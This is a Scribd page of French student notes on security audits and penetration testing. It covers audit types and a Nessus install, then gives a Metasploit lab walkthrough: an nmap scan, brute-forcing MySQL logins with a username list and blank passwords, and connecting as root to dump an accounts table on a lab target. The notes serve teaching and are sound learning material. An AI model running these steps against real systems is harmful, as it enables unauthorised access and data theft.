0% ont trouvé ce document utile (0 vote)
26 vues3 pages

Notes Audit Et PenTesting

Transféré par

cheikhououmarthiam11
Copyright
© © All Rights Reserved
Nous prenons très au sérieux les droits relatifs au contenu. Si vous pensez qu’il s’agit de votre contenu, signalez une atteinte au droit d’auteur ici.
Formats disponibles
Téléchargez aux formats PDF, TXT ou lisez en ligne sur Scribd
0% ont trouvé ce document utile (0 vote)
26 vues3 pages

Notes Audit Et PenTesting

Transféré par

cheikhououmarthiam11
Copyright
© © All Rights Reserved
Nous prenons très au sérieux les droits relatifs au contenu. Si vous pensez qu’il s’agit de votre contenu, signalez une atteinte au droit d’auteur ici.
Formats disponibles
Téléchargez aux formats PDF, TXT ou lisez en ligne sur Scribd

Audit et PenTesting

PCI DSS : Certification Paiement électronique


ISO 9000 : Qualité des entreprises
Audit interne = audite de première partie process interne de l’organisation auditée
Audit externe :
• Audit de seconde partie : exemple : client – fournisseur de services (lien entre
l’auditeur et l’audité)
• Audit de tiers partie : aucun lien entre le client et le fournisseur de services (aucun lien
entre l’auditeur et l’audité)
Ligne directrice ➔ recommendation, exigence
Audité : l’entreprise dans laquelle on effectue l’audite
Auditeur : l’entreprise qui réalise l’audite
Les parties impliquées dans l’audite : page 14
Audit combiné :
Audit conjoint :
Problème : récurrence d’un incident
Scan de vulnérabilité sur linux : nessus
Dezipper : dpkg -i Nessus-10.8.3-debian10_amd64.deb
Demarrage : systemctl start nessusd
Lancer sur le navigateur : [Link]
Selectionne la version : essentiel
Login : admin
Password : admin

1. Recuperer l’adresse ip de la machine metasploit : ifconfig


2. Scanner l’adresse ip cible avec nmap -Sv @ip_cible exemple : nmap -sV
[Link]
3. Connectez-vous sur la machine kali pour lancer Matasploit avec msfconsole en tant que
admin
4. Pour avoir des informations sur les services mysql, on tape la commande : search mysql
5. Connecter sur l’auxiliaire correspondant : use numero_auxiliaire/ nom_auxiliaire
exemple : use 28
6. Les optins de l’auxiliaire : show options
7. Connecter sur la cible par set rhosts @ip exemple : set rhosts [Link]
8.

Voir les port ouvert d’une machine : nmap @IP


Voir les port ouvert et version pour chaque service d’une machine : nmap -sV @ip

Pour se connecter a l’interface metasploite : msfconsole


Pour rechercher des informations sur un service : search nom_service
Exemple : search mysql
Pour rechercher la vulnerabilite pour scanner une ligne : use numero_ligne
Exemple : use 28
Pour voir les options sur la ligne 28 : show options
Ouvrir un autre terminal se connecter en tant que route … créer un ficher dans le bureau
Exemple : [Link]
Entrer :admin, root, metasploit, mysql
Appliquer l’attaque : set rhosts @ip_cible
Exemple : set rhosts [Link]
set user_file /home/kali/Desktop/[Link]
exploit
set username root
set blank_passwords true

Aller sur l’autre terminal et taper : mysql -u root -h [Link] --skip-ssl


show databases;
uses owasp10;
show tables;
select *from accounts;
Aller sur la machine Metasploit :
Connecter en tant que root taper : mysql -u root

Vous aimerez peut-être aussi